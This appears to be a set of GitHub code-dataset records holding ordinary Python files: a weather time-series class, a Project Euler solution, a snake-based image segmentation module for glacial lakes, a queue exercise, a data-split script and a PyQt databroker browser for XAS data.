data.get('timepoint')),\n 'cloud_cover': data.get('cloudcover'),\n 'temperature': data.get('temp2m'),\n }\n result.append(WeatherInformation.get_open_sky(constructor))\n self.timeseries = result\n for weather in self.timeseries:\n weather.solar_calc()\n return self\n\n def to_json(self) -> Dict[str, any]:\n \"\"\"Method to return the instantiated object as a dict\n\n Return the fields of a dataclass instance as a new dictionary mapping\n field names to field values.\n\n\n Returns:\n Dict[str, any]: Returns a dict to be converted to json with the\n attributes from class as keys and their value\n \"\"\"\n return asdict(self)\n\n @classmethod\n def get(\n cls,\n lon: float,\n lat: float,\n now: dt = dt.utcnow(),\n date_calc: str = date_calc,\n delta: int = delta_time,\n ) -> WeatherTimeSeries:\n \"\"\"class Method to construct the class\n\n Given a latitude longitude coordinate, an timestamp this method will\n calculate the end date of the time series passing the lon and lat to\n class attributes not initializing the timeseries attribute.\n\n Args:\n lon (float): an float representing a valid longitude\n lat (float): an float representing a valid latitude\n now (datetime, optional): Object of class datetime in utc. Defaults\n to utc at the time of processing.\n date_calc (function, optional): Pass the function date_calc as an\n dependency injection. Defaults to date_calc.\n delta (int, optional): the maximum hours to be calculate restricted\n by 168 as it is the limit of the api. Defaults to 48.\n\n Returns:\n WeatherTimeSeries: A partially instantiated object of the class\n WeatherTimeSeries\n \"\"\"\n constructor = {\n 'start_date': now.isoformat(),\n 'end_date': date_calc(now, delta),\n 'lon': lon,\n 'lat': lat,\n }\n\n return cls(**constructor)\n\n\n# %%\n","repo_name":"Ostrock/api","sub_path":"api/src/classes/WeatherTimeseries.py","file_name":"WeatherTimeseries.py","file_ext":"py","file_size_in_byte":4777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"953616229","text":"import math\n\nfrom solution_56 import digit_sum\n\n\ndef sqrt_digits(number: int) -> str:\n number *= 10**250\n root = number\n for i in range(100000):\n old = root\n root = (root + number // root) // 2\n if old == root:\n break\n return str(root)\n\n\ndef solution() -> int:\n result = 0\n for i in range(100):\n if math.floor(math.sqrt(i)) ** 2 != i:\n result += digit_sum(sqrt_digits(i)[:100])\n return result\n\n\nif __name__ == \"__main__\":\n import runner\n\n runner.run(globals())\n","repo_name":"martin-ueding/project-euler-solutions","sub_path":"solution_80.py","file_name":"solution_80.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"71156092846","text":"import numpy as np\nfrom scipy.interpolate import RectBivariateSpline\nfrom skimage.filters import sobel\nfrom skimage import img_as_float\nfrom scipy import ndimage as ndi\nfrom itertools import cycle\nfrom skimage.draw import polygon\n\n\ndef active_contour(image, snake, alpha=0.01, beta=0.1,\n w_line=0, w_edge=1, gamma=0.01,\n max_px_move=1.0,\n max_num_iter=2500, convergence=0.1,\n *,\n boundary_condition='periodic'):\n \"\"\"Active contour model.\n Active contours by fitting snakes to features of images. Supports single\n and multichannel 2D images. Snakes can be periodic (for segmentation) or\n have fixed and/or free ends.\n The output snake has the same length as the input boundary.\n As the number of points is constant, make sure that the initial snake\n has enough points to capture the details of the final contour.\n Parameters\n ----------\n image : (N, M) or (N, M, 3) ndarray\n Input image.\n snake : (N, 2) ndarray\n Initial snake coordinates. For periodic boundary conditions, endpoints\n must not be duplicated.\n alpha : float, optional\n Snake length shape parameter. Higher values makes snake contract\n faster.\n beta : float, optional\n Snake smoothness shape parameter. Higher values makes snake smoother.\n w_line : float, optional\n Controls attraction to brightness. Use negative values to attract\n toward dark regions.\n w_edge : float, optional\n Controls attraction to edges. Use negative values to repel snake from\n edges.\n gamma : float, optional\n Explicit time stepping parameter.\n max_px_move : float, optional\n Maximum pixel distance to move per iteration.\n max_num_iter : int, optional\n Maximum iterations to optimize snake shape.\n convergence : float, optional\n Convergence criteria.\n boundary_condition : string, optional\n Boundary conditions for the contour. Can be one of 'periodic',\n 'free', 'fixed', 'free-fixed', or 'fixed-free'. 'periodic' attaches\n the two ends of the snake, 'fixed' holds the end-points in place,\n and 'free' allows free movement of the ends. 'fixed' and 'free' can\n be combined by parsing 'fixed-free', 'free-fixed'. Parsing\n 'fixed-fixed' or 'free-free' yields same behaviour as 'fixed' and\n 'free', respectively.\n Returns\n -------\n snake : (N, 2) ndarray\n Optimised snake, same shape as input parameter.\n References\n ----------\n .. [1] Kass, M.; Witkin, A.; Terzopoulos, D. \"Snakes: Active contour\n models\". International Journal of Computer Vision 1 (4): 321\n (1988). :DOI:`10.1007/BF00133570`\n\n \"\"\"\n max_num_iter = int(max_num_iter)\n if max_num_iter <= 0:\n raise ValueError(\"max_num_iter should be >0.\")\n convergence_order = 10\n valid_bcs = ['periodic', 'free', 'fixed', 'free-fixed',\n 'fixed-free', 'fixed-fixed', 'free-free']\n if boundary_condition not in valid_bcs:\n raise ValueError(\"Invalid boundary condition.\\n\" +\n \"Should be one of: \"+\", \".join(valid_bcs)+'.')\n\n img = img_as_float(image)\n img = img.astype(float, copy=False)\n\n # Find edges using sobel:\n if w_edge != 0:\n if img.ndim == 1:\n edge = [sobel(img)]\n else:\n edge_new = [sobel(c) for c in np.moveaxis(img, -1, 0)]\n edge = np.stack(edge_new, axis=-1)\n else:\n edge = [0]\n\n # Superimpose intensity and edge images:\n if img.ndim > 1:\n img = w_line*np.sum(img, axis=2) \\\n + w_edge*np.sum(edge)\n else:\n img = w_line*img + w_edge*edge[0]\n\n # Interpolate for smoothness:\n intp = RectBivariateSpline(np.arange(img.shape[1]),\n np.arange(img.shape[0]),\n img.T, kx=2, ky=2, s=0)\n\n snake_xy = snake[:, ::-1]\n x = snake_xy[:, 0].astype(float)\n y = snake_xy[:, 1].astype(float)\n n = len(x)\n xsave = np.empty((convergence_order, n), dtype=float)\n ysave = np.empty((convergence_order, n), dtype=float)\n\n # Build snake shape matrix for Euler equation in double precision\n eye_n = np.eye(n, dtype=float)\n a = (np.roll(eye_n, -1, axis=0)\n + np.roll(eye_n, -1, axis=1)\n - 2 * eye_n) # second order derivative, central difference\n b = (np.roll(eye_n, -2, axis=0)\n + np.roll(eye_n, -2, axis=1)\n - 4 * np.roll(eye_n, -1, axis=0)\n - 4 * np.roll(eye_n, -1, axis=1)\n + 6 * eye_n) # fourth order derivative, central difference\n A = -alpha * a + beta * b\n\n # Impose boundary conditions different from periodic:\n sfixed = False\n if boundary_condition.startswith('fixed'):\n A[0, :] = 0\n A[1, :] = 0\n A[1, :3] = [1, -2, 1]\n sfixed = True\n efixed = False\n if boundary_condition.endswith('fixed'):\n A[-1, :] = 0\n A[-2, :] = 0\n A[-2, -3:] = [1, -2, 1]\n efixed = True\n sfree = False\n if boundary_condition.startswith('free'):\n A[0, :] = 0\n A[0, :3] = [1, -2, 1]\n A[1, :] = 0\n A[1, :4] = [-1, 3, -3, 1]\n sfree = True\n efree = False\n if boundary_condition.endswith('free'):\n A[-1, :] = 0\n A[-1, -3:] = [1, -2, 1]\n A[-2, :] = 0\n A[-2, -4:] = [-1, 3, -3, 1]\n efree = True\n\n # Only one inversion is needed for implicit spline energy minimization:\n inv = np.linalg.inv(A + gamma * eye_n)\n # can use float_dtype once we have computed the inverse in double precision\n inv = inv.astype(float, copy=False)\n\n # Explicit time stepping for image energy minimization:\n for i in range(max_num_iter):\n # RectBivariateSpline always returns float64, so call astype here\n fx = intp(x, y, dx=1, grid=False).astype(float, copy=False)\n fy = intp(x, y, dy=1, grid=False).astype(float, copy=False)\n\n if sfixed:\n fx[0] = 0\n fy[0] = 0\n if efixed:\n fx[-1] = 0\n fy[-1] = 0\n if sfree:\n fx[0] *= 2\n fy[0] *= 2\n if efree:\n fx[-1] *= 2\n fy[-1] *= 2\n xn = inv @ (gamma*x + fx)\n yn = inv @ (gamma*y + fy)\n\n # Movements are capped to max_px_move per iteration:\n dx = max_px_move * np.tanh(xn - x)\n dy = max_px_move * np.tanh(yn - y)\n if sfixed:\n dx[0] = 0\n dy[0] = 0\n if efixed:\n dx[-1] = 0\n dy[-1] = 0\n x += dx\n y += dy\n\n # Convergence criteria needs to compare to a number of previous\n # configurations since oscillations can occur.\n j = i % (convergence_order + 1)\n if j < convergence_order:\n xsave[j, :] = x\n ysave[j, :] = y\n else:\n dist = np.min(np.max(np.abs(xsave - x[None, :])\n + np.abs(ysave - y[None, :]), 1))\n if dist < convergence:\n break\n\n return np.stack([y, x], axis=1)\n\nclass _fcycle(object):\n\n def __init__(self, iterable):\n \"\"\"Call functions from the iterable each time it is called.\"\"\"\n self.funcs = cycle(iterable)\n\n def __call__(self, *args, **kwargs):\n f = next(self.funcs)\n return f(*args, **kwargs)\n\n\n# SI and IS operators for 2D and 3D.\n_P2 = [np.eye(3),\n np.array([[0, 1, 0]] * 3),\n np.flipud(np.eye(3)),\n np.rot90([[0, 1, 0]] * 3)]\n_P3 = [np.zeros((3, 3, 3)) for i in range(9)]\n\n_P3[0][:, :, 1] = 1\n_P3[1][:, 1, :] = 1\n_P3[2][1, :, :] = 1\n_P3[3][:, [0, 1, 2], [0, 1, 2]] = 1\n_P3[4][:, [0, 1, 2], [2, 1, 0]] = 1\n_P3[5][[0, 1, 2], :, [0, 1, 2]] = 1\n_P3[6][[0, 1, 2], :, [2, 1, 0]] = 1\n_P3[7][[0, 1, 2], [0, 1, 2], :] = 1\n_P3[8][[0, 1, 2], [2, 1, 0], :] = 1\n\n\ndef _init_level_set(init_level_set, image_shape):\n \"\"\"Auxiliary function for initializing level sets with a string.\n If `init_level_set` is not a string, it is returned as is.\n \"\"\"\n if isinstance(init_level_set, str):\n if init_level_set == 'circle':\n res = circle_level_set(image_shape)\n elif init_level_set == 'ellipsoid':\n res = ellipsoid_level_set(image_shape)\n else:\n raise ValueError(\"`init_level_set` not in \"\n \"['checkerboard', 'circle', 'ellipsoid']\")\n else:\n res = init_level_set\n return res\n\n\ndef sup_inf(u):\n \"\"\"SI operator.\"\"\"\n\n if np.ndim(u) == 2:\n P = _P2\n elif np.ndim(u) == 3:\n P = _P3\n else:\n raise ValueError(\"u has an invalid number of dimensions \"\n \"(should be 2 or 3)\")\n\n erosions = []\n for P_i in P:\n erosions.append(ndi.binary_erosion(u, P_i))\n\n return np.array(erosions, dtype=np.int8).max(0)\n\ndef inf_sup(u):\n \"\"\"IS operator.\"\"\"\n\n if np.ndim(u) == 2:\n P = _P2\n elif np.ndim(u) == 3:\n P = _P3\n else:\n raise ValueError(\"u has an invalid number of dimensions \"\n \"(should be 2 or 3)\")\n\n dilations = []\n for P_i in P:\n dilations.append(ndi.binary_dilation(u, P_i))\n\n return np.array(dilations, dtype=np.int8).min(0)\n\n_curvop = _fcycle([lambda u: sup_inf(inf_sup(u)), # SIoIS\n lambda u: inf_sup(sup_inf(u))]) # ISoSI\n\ndef circle_level_set(image_shape, center=None, radius=None):\n \"\"\"Create a circle level set with binary values.\n Parameters\n ----------\n image_shape : tuple of positive integers\n Shape of the image\n center : tuple of positive integers, optional\n Coordinates of the center of the circle given in (row, column). If not\n given, it defaults to the center of the image.\n radius : float, optional\n Radius of the circle. If not given, it is set to the 75% of the\n smallest image dimension.\n Returns\n -------\n out : array with shape `image_shape`\n Binary level set of the circle with the given `radius` and `center`.\n See also\n --------\n ellipsoid_level_set\n checkerboard_level_set\n \"\"\"\n\n if center is None:\n center = tuple(i // 2 for i in image_shape)\n\n if radius is None:\n radius = min(image_shape) * 3.0 / 8.0\n\n grid = np.mgrid[[slice(i) for i in image_shape]]\n grid = (grid.T - center).T\n phi = radius - np.sqrt(np.sum((grid)**2, 0))\n res = np.int8(phi > 0)\n return res\n\n\ndef level_set_from_polygon(shape, xy_polygon):\n img = np.zeros(shape, 'uint8')\n poly = xy_polygon\n rr, cc = polygon([a_tuple[1] for a_tuple in poly], [a_tuple[0] for a_tuple in poly], img.shape)\n img[rr,cc] = 1\n return img\n\n\ndef level_set_from_multipolygon(shape, xy_polygons):\n img = np.zeros(shape, 'uint8')\n for poly in xy_polygons:\n rr, cc = polygon([a_tuple[1] for a_tuple in poly], [a_tuple[0] for a_tuple in poly], img.shape)\n img[rr,cc] = 1\n return img\n\n\ndef ellipsoid_level_set(image_shape, center=None, semi_axis=None):\n \"\"\"Create a ellipsoid level set with binary values.\n Parameters\n ----------\n image_shape : tuple of positive integers\n Shape of the image\n center : tuple of integers, optional\n Coordinates of the center of the ellipsoid.\n If not given, it defaults to the center of the image.\n semi_axis : tuple of floats, optional\n Lengths of the semi-axis of the ellispoid.\n If not given, it defaults to the half of the image dimensions.\n Returns\n -------\n out : array with shape `image_shape`\n Binary level set of the ellipsoid with the given `center`\n and `semi_axis`.\n See also\n --------\n circle_level_set\n \"\"\"\n\n if center is None:\n center = tuple(i // 2 for i in image_shape)\n\n if semi_axis is None:\n semi_axis = tuple(i / 2 for i in image_shape)\n\n if len(center) != len(image_shape):\n raise ValueError(\"`center` and `image_shape` must have the same length.\")\n\n if len(semi_axis) != len(image_shape):\n raise ValueError(\"`semi_axis` and `image_shape` must have the same length.\")\n\n if len(image_shape) == 2:\n xc, yc = center\n rx, ry = semi_axis\n phi = 1 - np.fromfunction(\n lambda x, y: ((x - xc) / rx) ** 2 +\n ((y - yc) / ry) ** 2,\n image_shape, dtype=float)\n elif len(image_shape) == 3:\n xc, yc, zc = center\n rx, ry, rz = semi_axis\n phi = 1 - np.fromfunction(\n lambda x, y, z: ((x - xc) / rx) ** 2 +\n ((y - yc) / ry) ** 2 +\n ((z - zc) / rz) ** 2,\n image_shape, dtype=float)\n else:\n raise ValueError(\"`image_shape` must be a 2- or 3-tuple.\")\n\n res = np.int8(phi > 0)\n return res\n\n\ndef _check_input(image, init_level_set):\n \"\"\"Check that shapes of `image` and `init_level_set` match.\"\"\"\n if image.ndim not in [2, 3]:\n raise ValueError(\"`image` must be a 2 or 3-dimensional array.\")\n\n if len(image.shape) != len(init_level_set.shape):\n raise ValueError(\"The dimensions of the initial level set do not \"\n \"match the dimensions of the image.\")\n\n\ndef inverse_gaussian_gradient(x, alpha=100.0, sigma=5.0):\n \"\"\"Inverse of gradient magnitude.\n Compute the gaussian of magnitude of the gradients in the image and then inverts the\n result in the range [0, 1]. Flat areas are assigned values close to 1,\n while areas close to borders are assigned values close to 0.\n \"\"\"\n gradnorm = ndi.gaussian_gradient_magnitude(x, sigma, mode='nearest')\n return 1.0 / np.sqrt(1.0 + alpha * gradnorm)\n\n\ndef morphological_geodesic_active_contour(gimage, iterations,\n init_level_set='circle', smoothing=1,\n threshold='auto', balloon=0,\n iter_callback=lambda x: None):\n \"\"\"Morphological Geodesic Active Contours (MorphGAC).\n Geodesic active contours implemented with morphological operators. It can\n be used to segment objects with visible but noisy, cluttered, broken\n borders.\n Parameters\n ----------\n gimage : (M, N) or (B, M, N) array\n Preprocessed image or volume to be segmented. This is very rarely the\n original image. Instead, this is usually a preprocessed version of the\n original image that enhances and highlights the borders (or other\n structures) of the object to segment.\n `morphological_geodesic_active_contour` will try to stop the contour\n evolution in areas where `gimage` is small. See\n `morphsnakes.inverse_gaussian_gradient` as an example function to\n perform this preprocessing. Note that the quality of\n `morphological_geodesic_active_contour` might greatly depend on this\n preprocessing.\n iterations : uint\n Number of iterations to run.\n init_level_set : str, (M, N) array, or (B, M, N) array\n Initial level set. If an array is given, it will be binarized and used\n as the initial level set. If a string is given, it defines the method\n to generate a reasonable initial level set with the shape of the\n `image`. Accepted values are 'checkerboard' and 'circle'. See the\n documentation of `checkerboard_level_set` and `circle_level_set`\n respectively for details about how these level sets are created.\n smoothing : uint, optional\n Number of times the smoothing operator is applied per iteration.\n Reasonable values are around 1-4. Larger values lead to smoother\n segmentations.\n threshold : float, optional\n Areas of the image with a value smaller than this threshold will be\n considered borders. The evolution of the contour will stop in this\n areas.\n balloon : float, optional\n Balloon force to guide the contour in non-informative areas of the\n image, i.e., areas where the gradient of the image is too small to push\n the contour towards a border. A negative value will shrink the contour,\n while a positive value will expand the contour in these areas. Setting\n this to zero will disable the balloon force.\n iter_callback : function, optional\n If given, this function is called once per iteration with the current\n level set as the only argument. This is useful for debugging or for\n plotting intermediate results during the evolution.\n Returns\n -------\n out : (M, N) or (B, M, N) array\n Final segmentation (i.e., the final level set)\n See also\n --------\n inverse_gaussian_gradient, circle_level_set\n Notes\n -----\n This is a version of the Geodesic Active Contours (GAC) algorithm that uses\n morphological operators instead of solving partial differential equations\n (PDEs) for the evolution of the contour. The set of morphological operators\n used in this algorithm are proved to be infinitesimally equivalent to the\n GAC PDEs (see [1]_). However, morphological operators are do not suffer\n from the numerical stability issues typically found in PDEs (e.g., it is\n not necessary to find the right time step for the evolution), and are\n computationally faster.\n The algorithm and its theoretical derivation are described in [1]_.\n References\n ----------\n .. [1] A Morphological Approach to Curvature-based Evolution of Curves and\n Surfaces, Pablo Márquez-Neila, Luis Baumela, Luis Álvarez. In IEEE\n Transactions on Pattern Analysis and Machine Intelligence (PAMI),\n 2014, DOI 10.1109/TPAMI.2013.106\n \"\"\"\n\n image = gimage\n init_level_set = _init_level_set(init_level_set, image.shape)\n\n _check_input(image, init_level_set)\n\n if threshold == 'auto':\n threshold = np.percentile(image, 50)\n\n structure = np.ones((3,) * len(image.shape), dtype=np.int8)\n dimage = np.gradient(image)\n # threshold_mask = image > threshold\n if balloon != 0:\n threshold_mask_balloon = image > threshold / np.abs(balloon)\n\n u = np.int8(init_level_set > 0)\n\n iter_callback(u)\n\n for _ in range(iterations):\n\n # Balloon\n if balloon > 0:\n aux = ndi.binary_dilation(u, structure)\n elif balloon < 0:\n aux = ndi.binary_erosion(u, structure)\n if balloon != 0:\n u[threshold_mask_balloon] = aux[threshold_mask_balloon]\n\n # Image attachment\n aux = np.zeros_like(image)\n du = np.gradient(u)\n for el1, el2 in zip(dimage, du):\n aux += el1 * el2\n u[aux > 0] = 1\n u[aux < 0] = 0\n\n # Smoothing\n for _ in range(smoothing):\n u = _curvop(u)\n\n iter_callback(u)\n\n return u\n\n\ndef rgb2gray(img):\n \"\"\"Convert a RGB image to gray scale.\"\"\"\n return 0.2989 * img[..., 0] + 0.587 * img[..., 1] + 0.114 * img[..., 2]\n\n\ndef store_evolution_in(lst):\n \"\"\"Returns a callback function to store the evolution of the level sets in\n the given list.\n \"\"\"\n\n def _store(x):\n lst.append(np.copy(x))\n\n return _store\n\n\ndef snake_lakes_GAC(x, ls_center_point, iterations=300, ls_radious=10, igs_alpha=100, igs_sigma=2):\n # Load the image.\n imgcolor = x/256.\n img = rgb2gray(imgcolor)\n\n gimg = inverse_gaussian_gradient(img, alpha=igs_alpha, sigma=igs_sigma)\n\n # Initialization of the level-set with a circle. ls_center_point should be\n # coordinate tuple (x, y) in the center of the known polygon\n # ls_radious radious of the circle level set\n init_ls = circle_level_set(img.shape, ls_center_point, ls_radious)\n\n # Callback for visual plotting\n evolution = []\n callback = store_evolution_in(evolution)\n\n # Morphological GAC\n return morphological_geodesic_active_contour(gimg, iterations=iterations,\n init_level_set=init_ls,\n smoothing=2, threshold='auto',\n balloon=1, iter_callback=callback\n ).astype(np.uint8), evolution\n\n\ndef snake_lakes_GAC_from_polygon(x, polygon, iterations=300, igs_alpha=100, igs_sigma=2.25):\n # Load the image.\n imgcolor = x/256.\n img = rgb2gray(imgcolor)\n\n gimg = inverse_gaussian_gradient(img, alpha=igs_alpha, sigma=igs_sigma)\n \n # Initialization of the level-set.\n init_ls = level_set_from_polygon(img.shape, polygon)\n\n # Callback for visual plotting\n evolution = []\n callback = store_evolution_in(evolution)\n # Morphological GAC\n return morphological_geodesic_active_contour(gimg, iterations=iterations,\n init_level_set=init_ls,\n smoothing=2, threshold='auto',\n balloon=1, iter_callback=callback\n ).astype(np.uint8), evolution\n\n\ndef snake_lakes_GAC_from_multipolygon(x, multipolygon, iterations=300, igs_alpha=100, igs_sigma=2.25):\n # Load the image.\n imgcolor = x/256.\n img = rgb2gray(imgcolor)\n\n gimg = inverse_gaussian_gradient(img, alpha=igs_alpha, sigma=igs_sigma)\n \n # Initialization of the level-set.\n init_ls = level_set_from_multipolygon(img.shape, multipolygon)\n\n # Callback for visual plotting\n evolution = []\n callback = store_evolution_in(evolution)\n # Morphological GAC\n return morphological_geodesic_active_contour(gimg, iterations=iterations,\n init_level_set=init_ls,\n smoothing=2, threshold='auto',\n balloon=1, iter_callback=callback\n ).astype(np.uint8), evolution\n","repo_name":"anthonymlortiz/icimod.glacial-lakes-baselines","sub_path":"models/snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":21758,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"628548471","text":"from collections import deque\n\nworking_bees = deque([int(i) for i in input().split()])\nnectars = [int(i) for i in input().split()]\nsymbols = deque(input().split())\nhoney = 0\noperation = {\n \"+\": lambda x, y: x + y,\n \"-\": lambda x, y: abs(x - y),\n \"*\": lambda x, y: x * y,\n \"/\": lambda x, y: x / y,\n}\n\nwhile working_bees and nectars:\n bee = working_bees.popleft()\n nectar = nectars.pop()\n\n if nectar >= bee:\n if nectar != 0:\n symbol = symbols.popleft()\n honey += operation[symbol](bee, nectar)\n else:\n working_bees.appendleft(bee)\n\nprint(f'Total honey made: {honey}')\nif working_bees:\n print(f\"Bees left: {', '.join(str(i) for i in working_bees)}\")\nif nectars:\n print(f'Nectar left: {\", \".join(str(i) for i in nectars)}')\n\n\n\n\n","repo_name":"PavelElenov/Python_Advanced","sub_path":"Stacks, Queues, Tuples and Sets - Exercise/honey.py","file_name":"honey.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"877919628","text":"import random\n\nwith open('abalone.train') as f:\n lines = f.readlines()\n\nrandom.shuffle(lines)\nlines = lines[:-3]\ntotal = len(lines)\nchunk = total // 10\n\nfor i in range(10):\n lines_copy = lines.copy()\n val_lines = lines_copy[chunk * i: chunk * (i + 1)]\n del lines_copy[chunk * i: chunk * (i + 1)]\n train_lines = lines_copy\n assert len(train_lines) + len(val_lines) == total\n\n with open(f'abalone.train.{i}', 'w') as f:\n f.writelines(train_lines)\n\n with open(f'abalone.val.{i}', 'w') as f:\n f.writelines(val_lines)\n","repo_name":"endvroy/fml_hw2","sub_path":"random_split.py","file_name":"random_split.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"14131936807","text":"import os\nimport matplotlib.patches as mpatches\nimport numpy as np\nimport pkg_resources\n\nfrom PyQt5 import QtWidgets, QtCore, uic\nfrom PyQt5.QtCore import QSettings, QThread\nfrom PyQt5.QtWidgets import QMenu\nfrom PyQt5.Qt import Qt\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas, \\\n NavigationToolbar2QT as NavigationToolbar\n\nfrom xas.xasproject import XASDataSet\n\nfrom qtpy.QtWidgets import (\n QApplication,\n QPushButton,\n QVBoxLayout,\n QLabel,\n QMainWindow,\n QWidget,\n)\nfrom bluesky_widgets.models.search import Search\nfrom bluesky_widgets.qt.search import QtSearch\nfrom bluesky_live.event import Event\n\n\nfrom sys import platform\nimport datetime\nimport os\nimport time\nfrom pathlib import Path\nimport pandas as pd\n\n\nfrom isstools.dialogs.BasicDialogs import message_box\n\n\n\n\nif platform == 'darwin':\n ui_path = pkg_resources.resource_filename('xview', 'ui/ui_xview_databroker.ui')\nelse:\n ui_path = pkg_resources.resource_filename('xview', 'ui/ui_xview_databroker.ui')\n\n\nclass UIXviewDatabroker(*uic.loadUiType(ui_path)):\n def __init__(self, db=None, parent=None, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.setupUi(self)\n\n self.db = db\n self.range = 30\n self.parent = parent\n self.uid_list = []\n self.mode = 'Search'\n self.counter=0\n #self.tableWidget_data.selectionChanged.connect(self.show_start_doc)\n self.push_show_latest.clicked.connect(self.show_latest)\n self.push_show_later.clicked.connect(self.show_later)\n self.push_show_earlier.clicked.connect(self.show_earlier)\n self.push_goto_folder.clicked.connect(self.goto_folder)\n\n self.push_search.clicked.connect(self.search_db)\n\n self.tableWidget_data.setColumnCount(3)\n self.tableWidget_data.setHorizontalHeaderLabels(['Date', 'UID', 'Filename'])\n #self.tableWidget_data.setSelectionMode(QtWidgets.QAbstractItemView.MultiSelection)\n self.tableWidget_data.setSelectionBehavior(QtWidgets.QAbstractItemView.SelectRows)\n self.tableWidget_data.selectionModel().selectionChanged.connect(self.show_start_doc)\n\n\n def show_latest(self):\n self.counter = 0\n self.show_record_list()\n\n def show_record_list(self):\n self.list_uids.clear()\n self.uids = []\n self.entries = []\n\n print(f'Counter {self.counter}')\n for indx in range(self.range):\n record = -(indx+1)-self.range * self.counter\n document = self.db[record]\n uid = document.start['uid']\n timestamp = datetime.datetime.fromtimestamp(document.start['time'])\n try:\n filename = os.path.basename(document.start['interp_filename'])\n except:\n filename = 'tuning scan'\n time = timestamp.strftime('%m/%d/%y %H:%M:%S')\n entry = f'{time}...{uid[0:6]}...{filename}'\n self.entries.append(entry)\n self.uids.append(uid)\n\n self.list_uids.addItems(self.entries)\n\n\n def search_db(self):\n self.parent.statusBar().showMessage('Search in progress...')\n self.uid_list = list(self.db.v2.search({'element': self.lineEdit_element.text()}))\n self.parent.statusBar().showMessage('Search complete')\n self.get_records()\n\n def get_records(self):\n timestamps = []\n filenames = []\n self.parent.statusBar().showMessage('Getting records...')\n uids =self.uid_list[self.counter*100:((self.counter+1)*100)]\n print(uids[0:3])\n for uid in uids:\n document = self.db[uid]\n timestamps.append(datetime.datetime.fromtimestamp(document.start['time']))\n try:\n filenames.append(document.start['interp_filename'])\n except:\n filenames.append('empty')\n self.parent.statusBar().showMessage('Records received')\n\n self.record = pd.DataFrame(list(zip(timestamps, uids, filenames)),columns = ['Timestamp','Uid','Filename'])\n\n self.populate_table()\n\n def populate_table(self):\n for jj in range(self.tableWidget_data.rowCount()):\n self.tableWidget_data.removeRow(0)\n\n ptable_row_index = 0\n for jj in range(len(self.record)):\n self.tableWidget_data.insertRow(ptable_row_index)\n self.tableWidget_data.setItem(ptable_row_index, 0,\n QtWidgets.QTableWidgetItem(\n str(self.record['Timestamp'][jj]).split('.')[0]))\n self.tableWidget_data.setItem(ptable_row_index, 1,\n QtWidgets.QTableWidgetItem(\n self.record['Uid'][jj][:6]))\n self.tableWidget_data.setItem(ptable_row_index, 2,\n QtWidgets.QTableWidgetItem(\n os.path.basename(self.record['Filename'][jj])))\n\n ptable_row_index += 1\n\n for jj in range(3):\n self.tableWidget_data.resizeColumnToContents(jj)\n\n def show_later(self):\n print(f'Counter {self.counter}')\n self.counter += 1\n try:\n self.get_records()\n except:\n message_box('Message','End of record reached')\n\n def show_earlier(self):\n print(f'Counter {self.counter}')\n if self.counter > 0:\n self.counter -= 1\n self.get_records()\n else:\n message_box('Message','Start of record reached')\n\n def show_start_doc(self):\n if self.tableWidget_data.selectedIndexes():\n indx = self.tableWidget_data.selectedIndexes()[0].row()\n uid = self.uid_list[indx+100*self.counter]\n start_doc = self.db[uid].start\n self.textEdit_start_doc.setText(str(start_doc))\n\n\n def goto_folder(self):\n if self.tableWidget_data.selectedIndexes():\n indx = self.tableWidget_data.selectedIndexes()[0].row()\n uid = self.uid_list[indx+100*self.counter]\n document = self.db[uid]\n folder = os.path.dirname(document.start['interp_filename'])\n print(folder)\n self.parent.widget_data.working_folder = folder\n self.parent.widget_data.set_working_folder()\n self.parent.tabWidget.setCurrentWidget(self.parent.tabWidget.widget(0))\n filename = os.path.basename(document.start['interp_filename']).split('.')[0]\n print(f'Filename {filename}')\n self.parent.widget_data.set_selection(filename)\n\n\n\n#######\n\nclass SearchAndOpen(Search):\n \"\"\"\n Extend Search model with a signal for when a result is \"opened\".\n\n In your application, you might have multiple such signals associated with\n different buttons.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.events.add(open=Event)\n\n @property\n def selected_runs(self):\n # This property would be useful in general and should be added to the\n # Search itself in bluesky-widgets.\n return [self.results[uid] for uid in self.selected_uids]\n\nclass QtSearchListWithButton(QWidget):\n \"\"\"\n A view for SearchAndOpen.\n\n Combines the QtSearches widget with a button.\n \"\"\"\n\n def __init__(self, model: SearchAndOpen, parent, add_open_button=True, add_to_proj_button=False, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.model = model\n self.db = self.model.current_catalog\n self.parent = parent\n self.layout = QVBoxLayout()\n self.setLayout(self.layout)\n self.layout.addWidget(QtSearch(model))\n\n if add_open_button:\n self.add_open_button()\n\n if add_to_proj_button:\n self.add_to_proj_button()\n\n\n def add_open_button(self):\n # Add a button that does something with the currently-selected Runs\n # when you click it.\n self._open_button = QPushButton(\"Open\")\n self.layout.addWidget(self._open_button)\n\n # Register a callback (slot) for the button qt click signal.\n self._open_button.clicked.connect(self._on_click_open_button)\n\n\n def _on_click_open_button(self):\n \"\"\"\n Receive the Qt signal and emit a bluesky-widgets one.\n\n Include a list of BlueskyRuns corresponding to the current selection.\n \"\"\"\n # self.model.events.open(selected_runs=self.model.selected_runs)\n run_list = self.model.selected_runs\n\n\n if len(run_list) == 1:\n try:\n run_start = run_list[0].metadata['start']\n folder = os.path.dirname(run_start['interp_filename'])\n print(folder)\n self.parent.widget_data.working_folder = folder\n self.parent.widget_data.set_working_folder()\n self.parent.tabWidget.setCurrentWidget(self.parent.tabWidget.widget(0))\n filename = os.path.basename(run_start['interp_filename']).split('.')[0]\n print(f'Filename {filename}')\n self.parent.widget_data.set_selection(filename)\n except KeyError:\n print('This DB entry is not an experiment')\n else:\n print('Multiple scan selection is not supported yet')\n\n def add_to_proj_button(self):\n self._proj_button = QPushButton(\"Add to XAS project\")\n self.layout.addWidget(self._proj_button)\n\n # Register a callback (slot) for the button qt click signal.\n 